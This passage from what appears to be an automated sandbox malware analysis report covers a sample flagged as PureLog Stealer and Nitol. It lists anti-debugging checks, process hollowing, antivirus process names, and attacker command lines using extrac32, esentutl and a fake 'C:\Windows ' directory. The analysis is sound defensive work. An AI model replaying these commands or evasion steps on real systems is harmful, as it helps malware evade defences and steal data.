Source: Spectrum.exe, 0000002B.00000003.1834037087.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\
Source: Jwsmvmdw.PIF, 00000024.00000002.1753075839.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02B0F744

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

12_1_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

12_1_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B0894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02B0894C

Contains functionality to read the PEB

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0047B594 mov eax, dword ptr fs:[00000030h]	12_1_0047B594
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0003C1FA mov eax, dword ptr fs:[00000030h]	13_2_0003C1FA
Source: C:\Users\Public\alpha.pif	Code function: 17_2_0003C1FA mov eax, dword ptr fs:[00000030h]	17_2_0003C1FA
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0047B594 mov eax, dword ptr fs:[00000030h]	30_2_0047B594
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10001130 mov eax, dword ptr fs:[00000030h]	30_2_10001130
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10043F3D mov eax, dword ptr fs:[00000030h]	30_2_10043F3D
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0047B594 mov eax, dword ptr fs:[00000030h]	30_1_0047B594

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 12_1_0040ADB0 GetProcessHeap,HeapFree,

12_1_0040ADB0

Enables debug privileges

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_1_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_1_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_1_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 12_1_004123F1 SetUnhandledExceptionFilter,	12_1_004123F1
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00026EC0 SetUnhandledExceptionFilter,	13_2_00026EC0
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00026B40
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00026EC0 SetUnhandledExceptionFilter,	17_2_00026EC0
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00026B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00026B40
Source: C:\Users\Public\xpha.pif	Code function: 18_2_00893600 SetUnhandledExceptionFilter,	18_2_00893600
Source: C:\Users\Public\xpha.pif	Code function: 18_2_00893470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_00893470
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004123F1 SetUnhandledExceptionFilter,	30_2_004123F1
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10041361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_10041361
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10044C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_10044C7B
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_1_0040CE09
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_1_0040E61C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_1_00416F6A
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004123F1 SetUnhandledExceptionFilter,	30_1_004123F1

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory allocated: C:\Users\Public\Libraries\wdmvmswJ.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQuerySystemInformation: Indirect: 0x9B8462
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtAdjustPrivilegesToken: Indirect: 0x9B864C

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Section unmapped: C:\Users\Public\Libraries\wdmvmswJ.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 3FB008	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2B0008
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Memory written: C:\Users\Public\Libraries\wdmvmswJ.pif base: 2E2008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

30_2_10028550

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02AF5ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02AFA7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02AF5BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02AFA810
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: GetLocaleInfoA,	12_1_00417A20
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	13_2_00018572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	13_2_00016854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	13_2_00019310
Source: C:\Users\Public\alpha.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	17_2_00018572
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	17_2_00016854
Source: C:\Users\Public\alpha.pif	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	17_2_00019310
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	27_2_029B5ACC
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	27_2_029B5BD7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetLocaleInfoA,	27_2_029BA810
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: GetLocaleInfoA,	30_2_00417A20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: GetLocaleInfoA,	30_1_00417A20
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	36_2_029D5ACC
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	36_2_029D5BD7
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: GetLocaleInfoA,	36_2_029DA810

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\alg.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTF44A.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTF45B.tmp VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\msdtc.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\Locator.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\SensorDataService.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\snmptrap.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02AF920C GetLocalTime,

4_2_02AF920C

Source: C:\Windows\System32\AppVClient.exe

Code function: 22_2_00740080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,

22_2_00740080

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02AFB78C GetVersionExA,

4_2_02AFB78C

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match

File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.213f0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wdmvmswJ.pif.1e700000.852.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.wdmvmswJ.pif.1eb40f08.9.unpack, type: UNPACKEDPE
